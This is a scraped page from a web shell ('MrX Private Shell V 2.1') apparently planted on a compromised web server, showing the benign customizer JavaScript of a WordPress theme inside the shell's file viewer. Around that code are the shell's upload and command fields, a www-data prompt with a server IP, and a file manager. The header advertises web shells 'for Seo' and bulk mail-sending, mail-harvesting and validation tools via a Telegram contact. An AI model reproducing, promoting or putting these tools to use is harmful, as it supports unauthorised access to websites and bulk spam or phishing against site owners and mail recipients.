__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
( function( api ) {

	// Extends our custom "example-1" section.
	api.sectionConstructor['consultstreet-plugin-section'] = api.Section.extend( {

		// No events for this type of section.
		attachEvents: function () {},

		// Always make the section active.
		isContextuallyActive: function () {
			return true;
		}
	} );

} )( wp.customize );

function consultstreet_frontpage_sections_scroll( section_id ){
    var scroll_section_id = "theme-slider";

    var $contents = jQuery('#customize-preview iframe').contents();

    switch ( section_id ) {
        case 'accordion-section-consultstreet_theme_top_header_area':
        scroll_section_id = "site-header";
        break;

        case 'aaccordion-section-consultstreet_main_theme_slider':
        scroll_section_id = "theme-slider";
        break;

        case 'accordion-section-consultstreet_theme_info_area':
        scroll_section_id = "theme-info-area";
        break;

        case 'accordion-section-consultstreet_theme_service':
        scroll_section_id = "theme-services";
        break;

        case 'accordion-section-consultstreet_theme_project':
        scroll_section_id = "theme-project";
        break;

        case 'accordion-section-consultstreet_theme_funfact':
        scroll_section_id = "theme-funfact";
        break;

        case 'accordion-section-consultstreet_theme_testimonial':
        scroll_section_id = "theme-testimonial";
        break;

        case 'accordion-section-consultstreet_theme_wooshop':
        scroll_section_id = "theme-shop";
        break;

        case 'accordion-section-consultstreet_theme_cta':
        scroll_section_id = "theme-cta";
        break;

        case 'accordion-section-consultstreet_theme_team':
        scroll_section_id = "theme-team-mambers";
        break;
		
		case 'accordion-section-consultstreet_theme_blog':
        scroll_section_id = "theme-blog";
        break;
		
		case 'accordion-section-consultstreet_theme_client':
        scroll_section_id = "theme-sponsors";
        break;
    }

    if( $contents.find('#'+scroll_section_id).length > 0 ){
        $contents.find("html, body").animate({
        scrollTop: $contents.find( "#" + scroll_section_id ).offset().top
        }, 1000);
    }
}

jQuery('body').on('click', '#sub-accordion-panel-consultstreet_frontpage_settings .control-subsection .accordion-section-title', function(event) {
        var section_id = jQuery(this).parent('.control-subsection').attr('id');
        consultstreet_frontpage_sections_scroll( section_id );
});

Filemanager

Name Type Size Permission Actions
customizer-section.js File 2.47 KB 0644
customizer.js File 3.5 KB 0644
extend-customizer.js File 5.97 KB 0644
Filemanager